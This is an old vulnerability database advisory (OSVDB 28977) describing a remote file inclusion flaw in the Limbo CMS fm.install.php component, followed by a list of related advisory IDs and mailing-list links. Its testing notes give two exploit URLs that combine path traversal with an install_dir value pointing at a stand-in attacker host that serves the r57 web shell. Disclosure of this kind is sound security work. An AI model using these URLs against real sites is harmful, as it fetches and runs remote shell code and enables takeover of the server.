Limbo fm.install.php lm_absolute_path Variable Remote File Inclusion

2006-09-13T14:48:55
ID OSVDB:28977
Type osvdb
Reporter HACKERS PAL (security@soqor.net)
Modified 2006-09-13T14:48:55

Description

Manual Testing Notes

/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://[attacker]/tools/r57.txt?
/components/com_fm/fm.install.php?lm_absolute_path=../../&install_dir=http://[attacker]/tools/r57.txt?

References:

Vendor URL: http://www.limboforge.org/
Secunia Advisory ID: 21944
Related OSVDB ID: 28982
Related OSVDB ID: 28983
Related OSVDB ID: 28984
Related OSVDB ID: 28987
Related OSVDB ID: 28976
Related OSVDB ID: 28978
Related OSVDB ID: 28979
Related OSVDB ID: 28981
Related OSVDB ID: 28980
Related OSVDB ID: 28986
Related OSVDB ID: 28985
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0264.html
Mail List Post: http://attrition.org/pipermail/vim/2006-September/001043.html